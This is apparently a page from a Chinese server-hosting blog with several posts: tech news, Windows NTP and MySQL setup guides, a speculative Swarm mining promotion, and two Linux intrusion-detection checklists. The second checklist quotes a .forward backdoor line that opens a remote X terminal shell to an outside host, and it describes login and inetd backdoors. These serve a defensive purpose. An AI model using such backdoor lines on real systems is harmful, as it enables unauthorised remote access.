谷歌将铺设新海底电缆 连接美国与拉美

6月 11, 2021

近日,谷歌表示,将会铺设一条海底电缆,将美国、巴西、乌拉圭、阿根廷连起来,增强这些地区之间的互联网连接。

这条海底电缆名叫Firmina,它将是世界最长的海底电缆,从美国东海岸通往阿根廷Las Toninas,然后还会连接到巴西普拉亚格兰德(Praia Grande)和乌拉圭Punta del Este。

谷歌在声明中表示:“Firmina将为南美用户提供更好的谷歌服务。海底电缆有12对光纤,可以让北美到南美的传输更快更安全,让用户快速低延时接入谷歌产品,比如搜索、Gmail、YouTube和谷歌云服务。

谷歌将铺设新海底电缆 连接美国与拉美已关闭评论

Linux系统被入侵怎么检查?

6月 9, 2021


linux系统的服务器被入侵了怎么办,下面是总结的方法,可以供大家参考:
首先先用iptraf查下,如果没装的运行yuminstalliptraf装下,看里面是不是UDP包发的很多,如果是,基本都被人装了后门
1、检查帐户
#less/etc/passwd
#grep:0:/etc/passwd(检查是否产生了新用户,和UID、GID是0的用户)
#ls-l/etc/passwd(查看文件修改日期)
#awk-F:‘$3==0{print$1}’/etc/passwd(查看是否存在特权用户)
#awk-F:‘length($2)==0{print$1}’/etc/shadow(查看是否存在空口令帐户)
2、检查日志
#last(查看正常情况下登录到本机的所有用户的历史记录)
注意”enteredpromiscuousmode”
注意错误信息
注意RemoteProcedureCall(rpc)programswithalogentrythatincludesalargenumber(>20)strangecharacters(-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM)
3、检查进程
#ps-aux(注意UID是0的)
#lsof-ppid(察看该进程所打开端口和文件)
#cat/etc/inetd.conf|grep-v“^#”(检查守护进程)
检查隐藏进程
#ps-ef|awk‘{print}’|sort-n|uniq>1
#ls/porc|sort-n|uniq>2
#diff12
4、检查文件
#find/-uid0–perm-4000–print
#find/-size+10000k–print
#find/-name“…”–print
#find/-name“..”–print
#find/-name“.”–print
#find/-name””–print
注意SUID文件,可疑大于10M和空格文件
#find/-namecore-execls-l{};(检查系统中的core文件)
检查系统文件完整性
#rpm–qf/bin/ls
#rpm-qf/bin/login
#md5sum–b文件名
#md5sum–t文件名
5、检查RPM
#rpm–Va
输出格式:
S–Filesizediffers
M–Modediffers(permissions)
5–MD5sumdiffers
D–Devicenumbermismatch
L–readLinkpathmismatch
U–userownershipdiffers
G–groupownershipdiffers
T–modificationtimediffers
注意相关的/sbin,/bin,/usr/sbin,and/usr/bin
6、检查网络
#iplink|grepPROMISC(正常网卡不该在promisc模式,可能存在sniffer)
#lsof–i
#netstat–nap(察看不正常打开的TCP/UDP端口)
#arp–a
7、检查计划任务
注意root和UID是0的schedule
#crontab–uroot–l
#cat/etc/crontab
#ls/etc/cron.*
8、检查后门
#cat/etc/crontab
#ls/var/spool/cron/
#cat/etc/rc.d/rc.local
#ls/etc/rc.d
#ls/etc/rc3.d
#find/-typef-perm4000
9、检查内核模块
#lsmod
10、检查系统服务
#chkconfig
#rpcinfo-p(查看RPC服务)
11、检查rootkit
#rkhunter-c
#chkrootkit-q

Linux系统被入侵怎么检查?已关闭评论

Swarm挖矿有什么难度?

6月 7, 2021

Swarm,目前我国处于空投测试发展阶段,只能通过每天挖票据,由于中国官方管理机制,只有跟35个蜂后节点企业产生信息交互,所产出的票才能够参与空投,没有问题产生交互的也都是无效票,当然,现在我们谁都不知道自己手里的票是否为有效票。

群体挖掘是通过建立节点来实现的,节点的带宽很高。高级节点必须达到企业级千兆网络。单个企业高效管理节点为950U,整机18个高效发展节点为14888U,高效进行节点20兆带宽。

对于Swarm矿业,很多矿工只是引入了云节点(云服务器搭建好了,接入主网后就不能用了),并没有引入物理采掘机,因为官方会在6月10日公布对节点的最终要求,也就是说矿工需要根据节点要求调整物理采掘机,以保证矿工正常的货币生产。在他们的采矿机械销售合同中,也是有添加这个条款。

对于CHIA和Swarm的参与企业门槛和收益达到预期,其实就是我们可以不难看出,Swarm现在的市场经济热度较高,未来中国上线主网之后,对应的BZZ币价也会上涨,头矿的机会成为大家都懂,可能前一个月的产量,相当于一个未来工作半年的产量方面都有自己可能。

Swarm挖矿有什么难度?已关闭评论

腾讯云宣布四大国际云计算数据中心开服 正式对外提供云计算服务

6月 4, 2021

6月3日,腾讯云宣布在泰国曼谷、德国法兰克福、日本东京以及中国香港新增的四个国际数据中心同步开服,正式对外提供云计算技术和产业数字化解决方案。自此,腾讯云在曼谷、法兰克福以及东京构建了区域内双可用区格局,在中国香港则实现了区域内三可用区部署。

同时,腾讯云此次新增的四大国际数据中心全部采用Tier3+国际高标准机房,且均位于全球网络枢纽位置,拥有完善的骨干网络接入条件,能够就近为客户提供高质量的弹性计算、存储、大数据、AI、安全等云服务能力。

腾讯云国际高级副总裁杨宝树表示,四个国际数据中心的开服,进一步完善了腾讯云的全球化数据中心布局。对客户而言,能够借助腾讯云全球化的数据中心资源,和一体化的云计算技术能力,快速将业务扩展到更广阔的市场。同时,区域内双可用区甚至三可用区的布局,也能够助力客户打造更好的数据备份和灾备体系,保障业务的安全性和连续性。

公开资料显示,目前,加上新开服的四个数据中心,腾讯云在全球运营的可用区达到66个,覆盖27个地理区域。

腾讯云宣布四大国际云计算数据中心开服 正式对外提供云计算服务已关闭评论

Windows系统设置时间服务器教程

6月 2, 2021

Windows系统服务器可以做为时间服务器吗?答案是肯定的,win服务器是可以作为时间服务器的,其实我们只需修改相关注册表可以解决此问题:
1、运行regedit进入注册表,在对注册进行操作时请备份以防万一。

2、将服务器类型更改为NTP:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters\Type
值:NTP

3、将AnnounceFlags设置为5,意思是把本机coms做为时间源。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config\AnnounceFlags
值:5

4、启动NTP Server
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer\Enablend
值:1

5、指定时间源
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters\NtpServer\NtpServer
值:127.0.0.1本机IP后面跟上 0x1

6、更改轮询间隔
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollInterval\specialPollInterval
值:900秒(10进制)15分种轮询一次

7、更改时间校准
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config\MaxPosPhaseCorrection
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config\MaxNegPhaseCorrectionp
值都是:1800秒(10进制)30分钟校准一次

退出注册表,在CMD命令:net stop w32time (停止时间服务)net start w32time(启动时间服务)

Windows系统设置时间服务器教程已关闭评论

Linux系统云服务器如何检查是否被入侵?

5月 31, 2021


服务器安全,预防永远是第一位。服务器维护再用心,漏洞补丁更新再及时,也会存在安全隐患。在许多情况下,病毒入侵服务器后并不会马上爆发,会存在一个潜伏期,在病毒爆发之前进行查杀,也是服务器安全防护的重要手段。如何分析自己的服务器是否被入侵了呢?我们先来看看UNIX系统上一些入侵检测方法,以LINUX和Solaris为例。

1、检查系统密码文件
首先从明显的入手,查看一下passwd文件,ls–l/etc/passwd查看文件修改的日期。
检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。
1 awk–F:’$3==0{print$1}’/etc/passwd
顺便再检查一下系统里有没有空口令帐户:
1 awk–F:‘length($2)==0{print$1}’/etc/shadow

2、查看一下进程,看看有没有奇怪的进程
重点查看进程:ps–aef|grepinetd
inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd–s/tmp/.xxx之类的进程,着重看inetd–s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd–s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。
输入ps–aef查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill–9pid开杀死该进程,然后再运行ps–aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find/-name程序名–print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J
UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。
接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程
检查/etc/inetd.conf文件,输入:cat/etc/inetd.conf|grep–v“^#”,输出的信息就是你这台机器所开启的远程服务。
一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口
输入netstat-an,列出本机所有的连接和监听的端口,查看有没有非法连接。
输入netstat–rn,查看本机的路由、网关设置是否正确。
输入ifconfig–a,查看网卡设置。

5、检查系统日志
命令last|more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。
在linux下输入ls–al/var/log
在solaris下输入ls–al/var/adm
检查wtmputmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件
通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find/-namecore–execls–l{}\;依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward
这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:
find/-name“.rhosts”–print
find/-name“.forward”–print
在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。
Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一用户$HOME下的.forward可能设置如下:
\username|”/usr/local/X11/bin/xterm-disphacksys.other.dom:0.0–e/bin/sh”
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases).注意这只是一种简单的变换.更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm’sfilter或procmail类程序,很有可能还有问题。在Solaris系统下,如果你运行如下命令:
ln-s/var/mail/luser~/.forward
然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加”|/usr/bin/vacationme”,旧的symlink被移到~/.forward..BACKUP中。
直接删除掉这两个文件也可以。

8、检查系统文件完整性
检查文件的完整性有多种方法,通常我们通过输入ls–l文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm–V`rpm–qf文件名`来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以manrpm来获得更多的格式。
UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门:
UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum文件名检查该文件的md5签名。它的使用格式如下:md5sum–b使用二进制方式阅读文件;md5sum–c逆向检查MD5签名;md5sum–t使用文本方式阅读文件。
在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnetstreamtcpnowaitroot/usr/sbin/in.telnetdin.telnetd
可以看到它所使用的文件是/usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。
LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat/etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。
不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?
说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x1rootrootxxx.sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行find–perm4000–print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门
如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

10、手工入侵检测的缺陷
上面谈了一些手工入侵检测的方法,但这些方式有一定的缺陷,有的甚至是不可避免的缺陷,这就是为什么说手工检测是“体力活”的原因。我们先来看看这些缺陷:
1)手工入侵检测只能基于主机,也就是说所有的入侵检测工作只能在操作系统下面完成,这是它固有的缺陷;基本上所有凌驾于操作系统之外的入侵行为统统无法探测得到。网络级的入侵,交换机、路由器上面的入侵和攻击行为,作为服务器的操作系统都无法得知;信息已经从主机发送出去了,如果在传送的介质当中被拦截,主机的操作系统是永远无动于衷的。
2)手工的入侵检测要求精通操作系统,并且漏洞库资料的刷新要快;在做一个网管的同时要做一个黑客。可以说经验的积累永远跟不上全世界漏洞资料的更新,难保系统不被新的漏洞所侵入。
3)手工入侵检测只是“就事论事”,根据发生的某一情况判断入侵事件,再作出相应的对应和防范措施,而无法预先根据入侵者的探测行为作出对攻击事件的描述,定义事件级别,在不防碍系统正常工作的情况下阻止下一步对系统的入侵行为。
4)可以通过手工入侵检测发现主机上的某些漏洞,进而作出相应的安全措施。但却避免不了一种现象:无法避免两个入侵者利用同一个漏洞攻击主机,即无法判断攻击模式来切断入侵行为。
5)综上所述,手工的入侵检测行为对于系统安全来说只是治标而不治本,多半还是依靠管理员的技巧和经验来增强系统的安全性,没有,也不可能形成真正的安全体系,虽然聊胜于无,可以检测和追踪到某些入侵行为,但如果碰上同样精通系统的入侵者就很难抓住踪迹了。

11、入侵检测系统的比较
搭建真正的安全体系需要入侵检测系统—IDS,一个优秀的入侵检测系统辅以系统管理员的技巧和经验可以形成真正的安全体系,有效判断和切断入侵行为,真正保护主机、资料。人们有时候会以为ISS的realsecure是优秀的入侵检测系统,其实不然,realsecure带有一定的缺陷,不谈它对事件的误报、漏报和错报,首先它是一个英文的软件,使用和熟悉起来有一定的难度。而且由于是外国人的软件,很多hack对realsecure有深入的研究,已经发掘出它的一些漏洞,甚至是固有漏洞,我就曾经测试出有的攻击手段可以令realsecure瘫痪。再者,realsecure也是架设在服务器操作系统之上的,操作系统停止工作,同样令之停止工作,换句话说,很简单,攻击者攻击的目标往往就是realsecure本身。设想,假设你的系统依赖于入侵检测系统,而入侵检测系统被攻击者搞掉,那你的系统将大门敞开,任由出入,后果不堪设想。

Linux系统云服务器如何检查是否被入侵?已关闭评论

特斯拉之后,福特、宝马、戴姆勒在华建立数据中心

5月 28, 2021

上海车展特斯拉女车主“车顶维权”事件的持续发酵,让跨国车企在华搭建数据查询平台的事宜提上日程。

继5月25日特斯拉宣布已经在中国建立数据中心以实现数据存储本地化、并将陆续增加更多本地数据中心后,5月27日,消息称,福特、宝马、戴姆勒等跨国车企已经或准备在中国建立数据中心。

其中,福特表示已于2020年上半年在中国建立了一个数据中心,并在本地存储车辆数据;宝马方面表示将在中国运营“中国车队的本地数据中心”,但没有透露于何时启动;戴姆勒则称,在中国运营一个专用的汽车后端,用于存储汽车数据。

日产汽车和Stellantis表示将遵守中国的相关规定,但也没有透露更多细节。

此外,通用汽车和丰田汽车并未表态如何管理在中国的数据;雷诺汽车则表示,该公司在中国还没有汽车数据中心;大众汽车认为,遵守数据保护规则对于成功的数字化转型至关重要,但由于监管环境仍处于快速发展阶段,现在就对具体细节发表评论还为时过早。

不过,随着智能化的不断演进, 智能网联+自动驾驶的加持为用户带来了更加便捷的出行体验的同时,集成了大量的摄像头、雷达、测速仪、导航仪等各类传感器的智能汽车也掀开了隐私与数据安全的一角——远程控制、数据窃取、信息欺骗、隐私泄漏等安全问题已经陆续出现在智能汽车上。

有数据表明,截至2020年,智能网联汽车平均每天将产生4TB的数据,除车辆性能数据外,还包括驾驶员数据、位置数据和周边数据等涉及个人信息和国家安全的重要数据,这些数据亟需更加审慎的监管。

值得关注的是,5月12日,国家互联网信息办公室发布关于《汽车数据安全管理若干规定(征求意见稿)》。这是继4月29日工信部发布征求《信息安全技术网联汽车采集数据的安全要求》标准草案意见的通知,又一部门出台对汽车数据安全的管理办法。

意见稿指出,运营者处理重要数据,应当提前向省级网信部门和有关部门报告数据类型、规模、范围、保存地点与时限、使用方式,以及是否向第三方提供等。

此外,意见稿中明确,运营者收集个人信息应当取得被收集人同意,法律法规规定不需取得个人同意的除外。实践上难以实现的(如通过摄像头收集车外音视频信息),且确需提供的,应当进行匿名化或脱敏处理,包括删除含有能够识别自然人的画面,或对这些画面中的人脸等进行局部轮廓化处理等。

特斯拉之后,福特、宝马、戴姆勒在华建立数据中心已关闭评论

Linux系统安装Mysql教程

5月 26, 2021

首先下载MySQL安装程序,具体版本看实际需求。。

然后由于手动安装MYSQL,需要在系统中建立名为mysql的用户和组,并制定musql用户的宿主目录是”/usr/local/mysql/data”

#groupadd-g200mysql

#useradd-u200-gmysql-d/usr/local/mysql/data-Mmysql

然后将软件包释放到”/usr/local/“目录中,为了方便管理,用ln命令建立该目录的符号链接目录为mysql。

#tarzxvfMySQL-server-5.1.53-1.glibc23.i386.tar.gz-C/usr/local/

#cd/usr/local/

#ln-sMySQL-server-5.1.53-1.glibc23.i386/mysql

然后在”var/lib”建立名为mysql的子目录,并设置目录和MYSQL服务器安装目录的属主和属组

#mkdir/var/lib/mysql

#chown-Rmysql:mysql/var/lib/mysql

#chown-Rroot:mysql/usr/local/MySQL-server-5.1.53*

#chown-Rmysql:mysql/usr/local/mysql/data/

然后进入到MySQL的服务器程序的目录,复制mysql的配置文件my.cnf到”/etc”目录中,并执行mysql.install_db命令初始化MySQL服务器中的数据库。

#cd/usr/local/mysql

#cpsupport-files/my-medium.cnf/etc/my.cnf

如果mysql的RPM包在系统中已经安装,”/etc”目录会存在my.cnf文件,将提示覆盖原有的my.cnf文件

cp:overweite’/etc/my.cnf’?y

#./scripts/mysql_install_db

然后设置”/var/lib/mysql/”和”/usr/local/mysql/data/”两个目录中的所有文件属于mysql用户和用户组,以保证访问权限。

#chown-Rmysql:mysql/var/lib/mysql/

#chown-Rmysql:mysql/usr/local/mysql/data/

然后使用safe_mysqld命令启动MYSQL服务器运行,并制定MYSQL服务程序以系统用户mysql的身份运行

#/usr/local/mysql/bin/safe_mysqld–user=mysql&

由于数据库管理用户root的初始密码为空所以要设置

#/usr/local/mysql/bin/mysqladmin-urootpassword‘密码’

最后指定登录数据库的用户名

#/usr/local/mysql/bin/mysql-uroot-p(-p是设置提示用户输入口令)。

Linux系统安装Mysql教程已关闭评论

云服务器有哪些类型?

5月 24, 2021

云服务器和VPS一样,是从传统物理(独立)服务器基础上,通过虚拟化技术发展而来,管理方式三者差不多,只有一些细节的差别。但云服务器既然能够从传统服务器和VPS之间脱颖而出,自然有其不可替代的优势。由于虚拟化技术和用途的千差万别,云服务器自然也承担不同的角色,在实际运用中,云服务器具体有哪些类型呢?

由于中国互联网备案政策,根据网站是否备案,可以将云服务器分成备案型云服务器和免备案型云服务器。需要备案的云服务器,就是国内服务器。免备案型服务器则是港台服务器、国外服务器等。

如果按抗攻击强弱分呢,可以将云服务器分为高防云服务器和普通云服务器。高防云服务器就是在对抗DDOS攻击、CC攻击方

面力度更大;而普通云服务器则抗攻击相当弱一点,如果遇到防御之外的大型攻击,需要重新购买防护产品。

按网站规模大小呢,又可以将云服务器分为基础版,标准版以及高级版云服务器。这个分类就比较简单,就是服务器配置不同,一般网站访问量小的话,就用基础入门型服务器就可以了,如果是电商类访问量较大的网站,在选择配置时就需要更多的资源了。

对于普通网站,普通需求的用户来说,选择云服务器主要考虑内存、带宽、硬盘、防护、机房等参数就可以了。云服务器选择时,一开始先不要购买太高配置太好的服务器,用户可以选一个低配置的云服务器,当发现不够用的时,可以在要求主机服务商进行升级,升级只需要很短时间,一般不会影响网站业务。

云服务器有哪些类型?已关闭评论

1.8万机柜 中国移动长三角(南京)数据中心全部落成

5月 21, 2021

5月17日,江苏移动举行中国移动长三角(南京)数据中心二期工程客户机房交付仪式,宣布该数据中心全部落成。

中国移动(江苏南京)数据中心项目于2016年正式落户江北新区,位于星火路与学府路交叉口。数据中心包括4幢机房楼和5栋生产配套用楼,可承载1.8万个机柜、30万台服务器,远期出口带宽超10T。

这里是中国移动在华东地区的5G核心节点,对上直连国干节点,可以服务江苏、山东、安徽、上海、浙江、江西、福建等六省一市一半的4/5G用户。中国移动(江苏南京)数据中心项目一期此前早已顺利投产,一期交付7700个机柜,建成2幢机房楼(49758㎡)。

江苏移动举行中国移动长三角(南京)数据中心的建成交付,标志着江苏移动在全省乃至长三角地区的算力服务再上新台阶。

目前,腾讯、苏宁等互联网企业已入驻中国移动(江苏南京)数据中心。这里是腾讯华东区域数据节点以及苏宁全国数据节点,为长三角地区用户提供腾讯公有云(会议、游戏、视频、微信等)以及苏宁易购等服务,不仅可以提供拎包入住的精品机房,也可以定制需求,满足客户的个性化选择。其中有机房楼根据腾讯公司的要求开发,机架及运维基础设施均按照腾讯要求定制。

除腾讯、苏宁外,该数据中心还成功引进了浦口公安等政府机构入驻,是南京市新基建示范项目。

据工作人员介绍,在建设和运维方面,该数据中心采用了业界领先的技术,也做了很多创新性探索。例如,模块化施工、自然冷源、高压直流供电等建设技术处于业界先进水平;首创三路11万伏电源,供电保障99.99%以上;整体抗震级别达8级,拥有全国领先的制冷站和油机房,柴油后备时长可达24小时,冗余备份能力强。

1.8万机柜 中国移动长三角(南京)数据中心全部落成已关闭评论